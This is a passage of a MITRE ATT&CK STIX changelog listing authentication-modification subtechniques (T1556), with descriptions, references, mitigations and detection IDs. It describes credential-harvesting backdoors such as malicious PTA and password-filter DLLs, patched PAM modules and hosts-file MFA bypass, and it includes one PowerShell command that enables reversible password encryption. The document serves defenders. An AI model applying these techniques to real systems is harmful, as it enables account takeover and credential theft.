                    "type": "attack-pattern",
                    "id": "attack-pattern--54ca26f3-c172-4231-93e5-ccebcac2161f",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2022-09-28 13:29:53.354000+00:00",
                    "modified": "2026-04-16 20:07:52.922000+00:00",
                    "name": "Hybrid Identity",
                    "description": "Adversaries may patch, modify, or otherwise backdoor cloud authentication processes that are tied to on-premises user identities in order to bypass typical authentication mechanisms, access credentials, and enable persistent access to accounts.  \n\nMany organizations maintain hybrid user and device identities that are shared between on-premises and cloud-based environments. These can be maintained in a number of ways. For example, Microsoft Entra ID includes three options for synchronizing identities between Active Directory and Entra ID(Citation: Azure AD Hybrid Identity):\n\n* Password Hash Synchronization (PHS), in which a privileged on-premises account synchronizes user password hashes between Active Directory and Entra ID, allowing authentication to Entra ID to take place entirely in the cloud \n* Pass Through Authentication (PTA), in which Entra ID authentication attempts are forwarded to an on-premises PTA agent, which validates the credentials against Active Directory \n* Active Directory Federation Services (AD FS), in which a trust relationship is established between Active Directory and Entra ID \n\nAD FS can also be used with other SaaS and cloud platforms such as AWS and GCP, which will hand off the authentication process to AD FS and receive a token containing the hybrid users\u2019 identity and privileges. \n\nBy modifying authentication processes tied to hybrid identities, an adversary may be able to establish persistent privileged access to cloud resources. For example, adversaries who compromise an on-premises server running a PTA agent may inject a malicious DLL into the `AzureADConnectAuthenticationAgentService` process that authorizes all attempts to authenticate to Entra ID, as well as records user credentials.(Citation: Azure AD Connect for Read Teamers)(Citation: AADInternals Azure AD On-Prem to Cloud) In environments using AD FS, an adversary may edit the `Microsoft.IdentityServer.Servicehost` configuration file to load a malicious DLL that generates authentication tokens for any user with any set of claims, thereby bypassing multi-factor authentication and defined AD FS policies.(Citation: MagicWeb)\n\nIn some cases, adversaries may be able to modify the hybrid identity authentication process from the cloud. For example, adversaries who compromise a Global Administrator account in an Entra ID tenant may be able to register a new PTA agent via the web console, similarly allowing them to harvest credentials and log into the Entra ID environment as any user.(Citation: Mandiant Azure AD Backdoors)",
                    "kill_chain_phases": [
                        {
                            "kill_chain_name": "mitre-attack",
                            "phase_name": "defense-impairment"
                        },
                        {
                            "kill_chain_name": "mitre-attack",
                            "phase_name": "persistence"
                        },
                        {
                            "kill_chain_name": "mitre-attack",
                            "phase_name": "credential-access"
                        }
                    ],
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/techniques/T1556/007",
                            "external_id": "T1556.007"
                        },
                        {
                            "source_name": "Azure AD Connect for Read Teamers",
                            "description": "Adam Chester. (2019, February 18). Azure AD Connect for Red Teamers. Retrieved September 28, 2022.",
                            "url": "https://blog.xpnsec.com/azuread-connect-for-redteam/"
                        },
                        {
                            "source_name": "AADInternals Azure AD On-Prem to Cloud",
                            "description": "Dr. Nestori Syynimaa. (2020, July 13). Unnoticed sidekick: Getting access to cloud as an on-prem admin. Retrieved September 28, 2022.",
                            "url": "https://o365blog.com/post/on-prem_admin/"
                        },
                        {
                            "source_name": "MagicWeb",
                            "description": "Microsoft Threat Intelligence Center, Microsoft Detection and Response Team, Microsoft 365 Defender Research Team . (2022, August 24). MagicWeb: NOBELIUM\u2019s post-compromise trick to authenticate as anyone. Retrieved September 28, 2022.",
                            "url": "https://www.microsoft.com/security/blog/2022/08/24/magicweb-nobeliums-post-compromise-trick-to-authenticate-as-anyone/"
                        },
                        {
                            "source_name": "Azure AD Hybrid Identity",
                            "description": "Microsoft. (2022, August 26). Choose the right authentication method for your Azure Active Directory hybrid identity solution. Retrieved September 28, 2022.",
                            "url": "https://learn.microsoft.com/en-us/azure/active-directory/hybrid/choose-ad-authn"
                        },
                        {
                            "source_name": "Mandiant Azure AD Backdoors",
                            "description": "Mike Burns. (2020, September 30). Detecting Microsoft 365 and Azure Active Directory Backdoors. Retrieved September 28, 2022.",
                            "url": "https://www.mandiant.com/resources/detecting-microsoft-365-azure-active-directory-backdoors"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_contributors": [
                        "Praetorian"
                    ],
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "enterprise-attack"
                    ],
                    "x_mitre_is_subtechnique": true,
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_platforms": [
                        "IaaS",
                        "Identity Provider",
                        "Office Suite",
                        "SaaS",
                        "Windows"
                    ],
                    "x_mitre_version": "2.0",
                    "detailed_diff": "{\"dictionary_item_removed\": {\"root['x_mitre_detection']\": \"\"}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-04-16 20:07:52.922000+00:00\", \"old_value\": \"2025-04-15 22:40:10.913000+00:00\"}, \"root['kill_chain_phases'][1]['phase_name']\": {\"new_value\": \"defense-impairment\", \"old_value\": \"defense-evasion\", \"new_path\": \"root['kill_chain_phases'][0]['phase_name']\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}, \"root['x_mitre_version']\": {\"new_value\": \"2.0\", \"old_value\": \"1.1\"}}}",
                    "previous_version": "1.1",
                    "version_change": "1.1 \u2192 2.0",
                    "changelog_mitigations": {
                        "shared": [
                            "M1026: Privileged Account Management",
                            "M1032: Multi-factor Authentication",
                            "M1047: Audit"
                        ],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_datacomponent_detections": {
                        "shared": [],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_detectionstrategy_detections": {
                        "shared": [
                            "DET0293: Detect Hybrid Identity Authentication Process Modification"
                        ],
                        "new": [],
                        "dropped": []
                    }
                },
                {
                    "type": "attack-pattern",
                    "id": "attack-pattern--b4409cd8-0da9-46e1-a401-a241afd4d1cc",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2022-05-31 19:31:38.431000+00:00",
                    "modified": "2026-04-16 20:07:52.875000+00:00",
                    "name": "Multi-Factor Authentication",
                    "description": "Adversaries may disable or modify multi-factor authentication (MFA) mechanisms to enable persistent access to compromised accounts.\n\nOnce adversaries have gained access to a network by either compromising an account lacking MFA or by employing an MFA bypass method such as [Multi-Factor Authentication Request Generation](https://attack.mitre.org/techniques/T1621), adversaries may leverage their access to modify or completely disable MFA defenses. This can be accomplished by abusing legitimate features, such as excluding users from Azure AD Conditional Access Policies, registering a new yet vulnerable/adversary-controlled MFA method, or by manually patching MFA programs and configuration files to bypass expected functionality.(Citation: Mandiant APT42)(Citation: Azure AD Conditional Access Exclusions)\n\nFor example, modifying the Windows hosts file (`C:\\windows\\system32\\drivers\\etc\\hosts`) to redirect MFA calls to localhost instead of an MFA server may cause the MFA process to fail. If a \"fail open\" policy is in place, any otherwise successful authentication attempt may be granted access without enforcing MFA. (Citation: Russians Exploit Default MFA Protocol - CISA March 2022) \n\nDepending on the scope, goals, and privileges of the adversary, MFA defenses may be disabled for individual accounts or for all accounts tied to a larger group, such as all domain accounts in a victim's network environment.(Citation: Russians Exploit Default MFA Protocol - CISA March 2022) ",
                    "kill_chain_phases": [
                        {
                            "kill_chain_name": "mitre-attack",
                            "phase_name": "defense-impairment"
                        },
                        {
                            "kill_chain_name": "mitre-attack",
                            "phase_name": "persistence"
                        },
                        {
                            "kill_chain_name": "mitre-attack",
                            "phase_name": "credential-access"
                        }
                    ],
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/techniques/T1556/006",
                            "external_id": "T1556.006"
                        },
                        {
                            "source_name": "Russians Exploit Default MFA Protocol - CISA March 2022",
                            "description": "Cyber Security Infrastructure Agency. (2022, March 15). Russian State-Sponsored Cyber Actors Gain Network Access by Exploiting Default Multifactor Authentication Protocols and \u201cPrintNightmare\u201d Vulnerability. Retrieved May 31, 2022.",
                            "url": "https://www.cisa.gov/uscert/ncas/alerts/aa22-074a"
                        },
                        {
                            "source_name": "Mandiant APT42",
                            "description": "Mandiant. (n.d.). APT42: Crooked Charms, Cons and Compromise. Retrieved September 16, 2022.",
                            "url": "https://www.mandiant.com/media/17826"
                        },
                        {
                            "source_name": "Azure AD Conditional Access Exclusions",
                            "description": "Microsoft. (2022, August 26). Use Azure AD access reviews to manage users excluded from Conditional Access policies. Retrieved August 30, 2022.",
                            "url": "https://docs.microsoft.com/en-us/azure/active-directory/governance/conditional-access-exclusion"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_contributors": [
                        "Arun Seelagan, CISA",
                        "Liran Ravich, CardinalOps",
                        "Muhammad Moiz Arshad, @5T34L7H"
                    ],
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "enterprise-attack"
                    ],
                    "x_mitre_is_subtechnique": true,
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_platforms": [
                        "IaaS",
                        "Identity Provider",
                        "Linux",
                        "macOS",
                        "Office Suite",
                        "SaaS",
                        "Windows"
                    ],
                    "x_mitre_version": "2.0",
                    "detailed_diff": "{\"dictionary_item_removed\": {\"root['x_mitre_detection']\": \"\"}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-04-16 20:07:52.875000+00:00\", \"old_value\": \"2025-04-15 19:58:59.338000+00:00\"}, \"root['kill_chain_phases'][1]['phase_name']\": {\"new_value\": \"defense-impairment\", \"old_value\": \"defense-evasion\", \"new_path\": \"root['kill_chain_phases'][0]['phase_name']\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}, \"root['x_mitre_version']\": {\"new_value\": \"2.0\", \"old_value\": \"1.4\"}}}",
                    "previous_version": "1.4",
                    "version_change": "1.4 \u2192 2.0",
                    "changelog_mitigations": {
                        "shared": [
                            "M1018: User Account Management",
                            "M1032: Multi-factor Authentication",
                            "M1047: Audit"
                        ],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_datacomponent_detections": {
                        "shared": [],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_detectionstrategy_detections": {
                        "shared": [
                            "DET0190: Detect MFA Modification or Disabling Across Platforms"
                        ],
                        "new": [],
                        "dropped": []
                    }
                },
                {
                    "type": "attack-pattern",
                    "id": "attack-pattern--fa44a152-ac48-441e-a524-dd7b04b8adcd",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2020-10-19 17:58:04.155000+00:00",
                    "modified": "2026-04-16 20:07:53.117000+00:00",
                    "name": "Network Device Authentication",
                    "description": "Adversaries may use [Patch System Image](https://attack.mitre.org/techniques/T1601/001) to hard code a password in the operating system, thus bypassing of native authentication mechanisms for local accounts on network devices.\n\n[Modify System Image](https://attack.mitre.org/techniques/T1601) may include implanted code to the operating system for network devices to provide access for adversaries using a specific password.  The modification includes a specific password which is implanted in the operating system image via the patch.  Upon authentication attempts, the inserted code will first check to see if the user input is the password. If so, access is granted. Otherwise, the implanted code will pass the credentials on for verification of potentially valid credentials.(Citation: Mandiant - Synful Knock)",
                    "kill_chain_phases": [
                        {
                            "kill_chain_name": "mitre-attack",
                            "phase_name": "defense-impairment"
                        },
                        {
                            "kill_chain_name": "mitre-attack",
                            "phase_name": "persistence"
                        },
                        {
                            "kill_chain_name": "mitre-attack",
                            "phase_name": "credential-access"
                        }
                    ],
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/techniques/T1556/004",
                            "external_id": "T1556.004"
                        },
                        {
                            "source_name": "Mandiant - Synful Knock",
                            "description": "Bill Hau, Tony Lee, Josh Homan. (2015, September 15). SYNful Knock - A Cisco router implant - Part I. Retrieved November 17, 2024.",
                            "url": "https://cloud.google.com/blog/topics/threat-intelligence/synful-knock-acis/"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "enterprise-attack"
                    ],
                    "x_mitre_is_subtechnique": true,
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_platforms": [
                        "Network Devices"
                    ],
                    "x_mitre_version": "3.0",
                    "detailed_diff": "{\"dictionary_item_removed\": {\"root['x_mitre_detection']\": \"\"}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-04-16 20:07:53.117000+00:00\", \"old_value\": \"2025-10-24 17:49:38.719000+00:00\"}, \"root['kill_chain_phases'][1]['phase_name']\": {\"new_value\": \"defense-impairment\", \"old_value\": \"defense-evasion\", \"new_path\": \"root['kill_chain_phases'][0]['phase_name']\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}, \"root['x_mitre_version']\": {\"new_value\": \"3.0\", \"old_value\": \"2.1\"}}, \"iterable_item_removed\": {\"root['external_references'][2]\": {\"source_name\": \"Cisco IOS Software Integrity Assurance - Image File Verification\", \"description\": \"Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Cisco IOS Image File Verification. Retrieved October 19, 2020.\", \"url\": \"https://tools.cisco.com/security/center/resources/integrity_assurance.html#7\"}, \"root['external_references'][3]\": {\"source_name\": \"Cisco IOS Software Integrity Assurance - Run-Time Memory Verification\", \"description\": \"Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Cisco IOS Run-Time Memory Integrity Verification. Retrieved October 19, 2020.\", \"url\": \"https://tools.cisco.com/security/center/resources/integrity_assurance.html#13\"}}}",
                    "previous_version": "2.1",
                    "version_change": "2.1 \u2192 3.0",
                    "changelog_mitigations": {
                        "shared": [
                            "M1026: Privileged Account Management",
                            "M1032: Multi-factor Authentication"
                        ],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_datacomponent_detections": {
                        "shared": [],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_detectionstrategy_detections": {
                        "shared": [
                            "DET0272: Detect Modification of Network Device Authentication via Patched System Images"
                        ],
                        "new": [],
                        "dropped": []
                    }
                },
                {
                    "type": "attack-pattern",
                    "id": "attack-pattern--90c4a591-d02d-490b-92aa-619d9701ac04",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2023-03-30 22:45:00.431000+00:00",
                    "modified": "2026-04-16 20:07:53.025000+00:00",
                    "name": "Network Provider DLL",
                    "description": "Adversaries may register malicious network provider dynamic link libraries (DLLs) to capture cleartext user credentials during the authentication process. Network provider DLLs allow Windows to interface with specific network protocols and can also support add-on credential management functions.(Citation: Network Provider API) During the logon process, Winlogon (the interactive logon module) sends credentials to the local `mpnotify.exe` process via RPC. The `mpnotify.exe` process then shares the credentials in cleartext with registered credential managers when notifying that a logon event is happening.(Citation: NPPSPY - Huntress)(Citation: NPPSPY Video)(Citation: NPLogonNotify) \n\nAdversaries can configure a malicious network provider DLL to receive credentials from `mpnotify.exe`.(Citation: NPPSPY) Once installed as a credential manager (via the Registry), a malicious DLL can receive and save credentials each time a user logs onto a Windows workstation or domain via the `NPLogonNotify()` function.(Citation: NPLogonNotify)\n\nAdversaries may target planting malicious network provider DLLs on systems known to have increased logon activity and/or administrator logon activity, such as servers and domain controllers.(Citation: NPPSPY - Huntress)",
                    "kill_chain_phases": [
                        {
                            "kill_chain_name": "mitre-attack",
                            "phase_name": "defense-impairment"
                        },
                        {
                            "kill_chain_name": "mitre-attack",
                            "phase_name": "persistence"
                        },
                        {
                            "kill_chain_name": "mitre-attack",
                            "phase_name": "credential-access"
                        }
                    ],
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/techniques/T1556/008",
                            "external_id": "T1556.008"
                        },
                        {
                            "source_name": "NPPSPY - Huntress",
                            "description": " Dray Agha. (2022, August 16). Cleartext Shenanigans: Gifting User Passwords to Adversaries With NPPSPY. Retrieved March 30, 2023.",
                            "url": "https://www.huntress.com/blog/cleartext-shenanigans-gifting-user-passwords-to-adversaries-with-nppspy"
                        },
                        {
                            "source_name": "NPPSPY Video",
                            "description": "Grzegorz Tworek. (2021, December 14). How winlogon.exe shares the cleartext password with custom DLLs. Retrieved March 30, 2023.",
                            "url": "https://www.youtube.com/watch?v=ggY3srD9dYs"
                        },
                        {
                            "source_name": "NPPSPY",
                            "description": "Grzegorz Tworek. (2021, December 15). NPPSpy. Retrieved March 30, 2023.",
                            "url": "https://github.com/gtworek/PSBits/tree/master/PasswordStealing/NPPSpy"
                        },
                        {
                            "source_name": "Network Provider API",
                            "description": "Microsoft. (2021, January 7). Network Provider API. Retrieved March 30, 2023.",
                            "url": "https://learn.microsoft.com/en-us/windows/win32/secauthn/network-provider-api"
                        },
                        {
                            "source_name": "NPLogonNotify",
                            "description": "Microsoft. (2021, October 21). NPLogonNotify function (npapi.h). Retrieved March 30, 2023.",
                            "url": "https://learn.microsoft.com/en-us/windows/win32/api/npapi/nf-npapi-nplogonnotify"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_contributors": [
                        "CrowdStrike Falcon OverWatch",
                        "Jai Minton"
                    ],
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "enterprise-attack"
                    ],
                    "x_mitre_is_subtechnique": true,
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_platforms": [
                        "Windows"
                    ],
                    "x_mitre_version": "2.0",
                    "detailed_diff": "{\"dictionary_item_removed\": {\"root['x_mitre_detection']\": \"\"}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-04-16 20:07:53.025000+00:00\", \"old_value\": \"2025-04-15 22:51:56.379000+00:00\"}, \"root['kill_chain_phases'][1]['phase_name']\": {\"new_value\": \"defense-impairment\", \"old_value\": \"defense-evasion\", \"new_path\": \"root['kill_chain_phases'][0]['phase_name']\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}, \"root['x_mitre_version']\": {\"new_value\": \"2.0\", \"old_value\": \"1.0\"}}}",
                    "previous_version": "1.0",
                    "version_change": "1.0 \u2192 2.0",
                    "changelog_mitigations": {
                        "shared": [
                            "M1024: Restrict Registry Permissions",
                            "M1028: Operating System Configuration",
                            "M1047: Audit"
                        ],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_datacomponent_detections": {
                        "shared": [],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_detectionstrategy_detections": {
                        "shared": [
                            "DET0580: Detect Network Provider DLL Registration and Credential Capture"
                        ],
                        "new": [],
                        "dropped": []
                    }
                },
                {
                    "type": "attack-pattern",
                    "id": "attack-pattern--3731fbcd-0e43-47ae-ae6c-d15e510f0d42",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2020-02-11 19:05:45.829000+00:00",
                    "modified": "2026-04-16 20:07:53.031000+00:00",
                    "name": "Password Filter DLL",
                    "description": "Adversaries may register malicious password filter dynamic link libraries (DLLs) into the authentication process to acquire user credentials as they are validated. \n\nWindows password filters are password policy enforcement mechanisms for both domain and local accounts. Filters are implemented as DLLs containing a method to validate potential passwords against password policies. Filter DLLs can be positioned on local computers for local accounts and/or domain controllers for domain accounts. Before registering new passwords in the Security Accounts Manager (SAM), the Local Security Authority (LSA) requests validation from each registered filter. Any potential changes cannot take effect until every registered filter acknowledges validation. \n\nAdversaries can register malicious password filters to harvest credentials from local computers and/or entire domains. To perform proper validation, filters must receive plain-text credentials from the LSA. A malicious password filter would receive these plain-text credentials every time a password request is made.(Citation: Carnal Ownage Password Filters Sept 2013)",
                    "kill_chain_phases": [
                        {
                            "kill_chain_name": "mitre-attack",
                            "phase_name": "defense-impairment"
                        },
                        {
                            "kill_chain_name": "mitre-attack",
                            "phase_name": "persistence"
                        },
                        {
                            "kill_chain_name": "mitre-attack",
                            "phase_name": "credential-access"
                        }
                    ],
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/techniques/T1556/002",
                            "external_id": "T1556.002"
                        },
                        {
                            "source_name": "Carnal Ownage Password Filters Sept 2013",
                            "description": "Fuller, R. (2013, September 11). Stealing passwords every time they change. Retrieved November 21, 2017.",
                            "url": "http://carnal0wnage.attackresearch.com/2013/09/stealing-passwords-every-time-they.html"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_contributors": [
                        "Vincent Le Toux"
                    ],
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "enterprise-attack"
                    ],
                    "x_mitre_is_subtechnique": true,
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_platforms": [
                        "Windows"
                    ],
                    "x_mitre_version": "3.0",
                    "detailed_diff": "{\"dictionary_item_removed\": {\"root['x_mitre_detection']\": \"\"}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-04-16 20:07:53.031000+00:00\", \"old_value\": \"2025-10-24 17:48:39.067000+00:00\"}, \"root['kill_chain_phases'][1]['phase_name']\": {\"new_value\": \"defense-impairment\", \"old_value\": \"defense-evasion\", \"new_path\": \"root['kill_chain_phases'][0]['phase_name']\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}, \"root['x_mitre_version']\": {\"new_value\": \"3.0\", \"old_value\": \"2.1\"}}, \"iterable_item_removed\": {\"root['external_references'][1]\": {\"source_name\": \"Clymb3r Function Hook Passwords Sept 2013\", \"description\": \"Bialek, J. (2013, September 15). Intercepting Password Changes With Function Hooking. Retrieved November 21, 2017.\", \"url\": \"https://clymb3r.wordpress.com/2013/09/15/intercepting-password-changes-with-function-hooking/\"}}}",
                    "previous_version": "2.1",
                    "version_change": "2.1 \u2192 3.0",
                    "changelog_mitigations": {
                        "shared": [
                            "M1028: Operating System Configuration"
                        ],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_datacomponent_detections": {
                        "shared": [],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_detectionstrategy_detections": {
                        "shared": [
                            "DET0472: Detect Malicious Password Filter DLL Registration"
                        ],
                        "new": [],
                        "dropped": []
                    }
                },
                {
                    "type": "attack-pattern",
                    "id": "attack-pattern--06c00069-771a-4d57-8ef5-d3718c1a8771",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2020-06-26 04:01:09.648000+00:00",
                    "modified": "2026-04-16 20:07:53.037000+00:00",
                    "name": "Pluggable Authentication Modules",
                    "description": "Adversaries may modify pluggable authentication modules (PAM) to access user credentials or enable otherwise unwarranted access to accounts. PAM is a modular system of configuration files, libraries, and executable files which guide authentication for many services. The most common authentication module is <code>pam_unix.so</code>, which retrieves, sets, and verifies account authentication information in <code>/etc/passwd</code> and <code>/etc/shadow</code>.(Citation: Apple PAM)(Citation: Man Pam_Unix)(Citation: Red Hat PAM)\n\nAdversaries may modify components of the PAM system to create backdoors. PAM components, such as <code>pam_unix.so</code>, can be patched to accept arbitrary adversary supplied values as legitimate credentials.(Citation: PAM Backdoor)\n\nMalicious modifications to the PAM system may also be abused to steal credentials. Adversaries may infect PAM resources with code to harvest user credentials, since the values exchanged with PAM components may be plain-text since PAM does not store passwords.(Citation: PAM Creds)(Citation: Apple PAM)",
                    "kill_chain_phases": [
                        {
                            "kill_chain_name": "mitre-attack",
                            "phase_name": "defense-impairment"
                        },
                        {
                            "kill_chain_name": "mitre-attack",
                            "phase_name": "persistence"
                        },
                        {
                            "kill_chain_name": "mitre-attack",
                            "phase_name": "credential-access"
                        }
                    ],
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/techniques/T1556/003",
                            "external_id": "T1556.003"
                        },
                        {
                            "source_name": "Apple PAM",
                            "description": "Apple. (2011, May 11). PAM - Pluggable Authentication Modules. Retrieved June 25, 2020.",
                            "url": "https://opensource.apple.com/source/dovecot/dovecot-239/dovecot/doc/wiki/PasswordDatabase.PAM.txt"
                        },
                        {
                            "source_name": "Man Pam_Unix",
                            "description": "die.net. (n.d.). pam_unix(8) - Linux man page. Retrieved June 25, 2020.",
                            "url": "https://linux.die.net/man/8/pam_unix"
                        },
                        {
                            "source_name": "PAM Creds",
                            "description": "Fern\u00e1ndez, J. M. (2018, June 27). Exfiltrating credentials via PAM backdoors & DNS requests. Retrieved November 17, 2024.",
                            "url": "https://web.archive.org/web/20240303094335/https://x-c3ll.github.io/posts/PAM-backdoor-DNS/"
                        },
                        {
                            "source_name": "Red Hat PAM",
                            "description": "Red Hat. (n.d.). CHAPTER 2. USING PLUGGABLE AUTHENTICATION MODULES (PAM). Retrieved June 25, 2020.",
                            "url": "https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/6/html/managing_smart_cards/pluggable_authentication_modules"
                        },
                        {
                            "source_name": "PAM Backdoor",
                            "description": "zephrax. (2018, August 3). linux-pam-backdoor. Retrieved June 25, 2020.",
                            "url": "https://github.com/zephrax/linux-pam-backdoor"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_contributors": [
                        "George Allen, VMware Carbon Black",
                        "Scott Knight, @sdotknight, VMware Carbon Black"
                    ],
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "enterprise-attack"
                    ],
                    "x_mitre_is_subtechnique": true,
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_platforms": [
                        "Linux",
                        "macOS"
                    ],
                    "x_mitre_version": "3.0",
                    "detailed_diff": "{\"dictionary_item_removed\": {\"root['x_mitre_detection']\": \"\"}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-04-16 20:07:53.037000+00:00\", \"old_value\": \"2025-10-24 17:48:21.118000+00:00\"}, \"root['kill_chain_phases'][1]['phase_name']\": {\"new_value\": \"defense-impairment\", \"old_value\": \"defense-evasion\", \"new_path\": \"root['kill_chain_phases'][0]['phase_name']\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}, \"root['x_mitre_version']\": {\"new_value\": \"3.0\", \"old_value\": \"2.1\"}}}",
                    "previous_version": "2.1",
                    "version_change": "2.1 \u2192 3.0",
                    "changelog_mitigations": {
                        "shared": [
                            "M1026: Privileged Account Management",
                            "M1032: Multi-factor Authentication"
                        ],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_datacomponent_detections": {
                        "shared": [],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_detectionstrategy_detections": {
                        "shared": [
                            "DET0454: Detect Malicious Modification of Pluggable Authentication Modules (PAM)"
                        ],
                        "new": [],
                        "dropped": []
                    }
                },
                {
                    "type": "attack-pattern",
                    "id": "attack-pattern--d50955c2-272d-4ac8-95da-10c29dda1c48",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2022-01-13 20:02:28.349000+00:00",
                    "modified": "2026-04-16 20:07:53.082000+00:00",
                    "name": "Reversible Encryption",
                    "description": "An adversary may abuse Active Directory authentication encryption properties to gain access to credentials on Windows systems. The <code>AllowReversiblePasswordEncryption</code> property specifies whether reversible password encryption for an account is enabled or disabled. By default this property is disabled (instead storing user credentials as the output of one-way hashing functions) and should not be enabled unless legacy or other software require it.(Citation: store_pwd_rev_enc)\n\nIf the property is enabled and/or a user changes their password after it is enabled, an adversary may be able to obtain the plaintext of passwords created/changed after the property was enabled. To decrypt the passwords, an adversary needs four components:\n\n1. Encrypted password (<code>G$RADIUSCHAP</code>) from the Active Directory user-structure <code>userParameters</code>\n2. 16 byte randomly-generated value (<code>G$RADIUSCHAPKEY</code>) also from <code>userParameters</code>\n3. Global LSA secret (<code>G$MSRADIUSCHAPKEY</code>)\n4. Static key hardcoded in the Remote Access Subauthentication DLL (<code>RASSFM.DLL</code>)\n\nWith this information, an adversary may be able to reproduce the encryption key and subsequently decrypt the encrypted password value.(Citation: how_pwd_rev_enc_1)(Citation: how_pwd_rev_enc_2)\n\nAn adversary may set this property at various scopes through Local Group Policy Editor, user properties, Fine-Grained Password Policy (FGPP), or via the ActiveDirectory [PowerShell](https://attack.mitre.org/techniques/T1059/001) module. For example, an adversary may implement and apply a FGPP to users or groups if the Domain Functional Level is set to \"Windows Server 2008\" or higher.(Citation: dump_pwd_dcsync) In PowerShell, an adversary may make associated changes to user settings using commands similar to <code>Set-ADUser -AllowReversiblePasswordEncryption $true</code>.",
                    "kill_chain_phases": [
                        {
                            "kill_chain_name": "mitre-attack",
                            "phase_name": "defense-impairment"
                        },
                        {
                            "kill_chain_name": "mitre-attack",
                            "phase_name": "persistence"
                        },
                        {
                            "kill_chain_name": "mitre-attack",
                            "phase_name": "credential-access"
                        }
                    ],
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/techniques/T1556/005",
                            "external_id": "T1556.005"
                        },
                        {
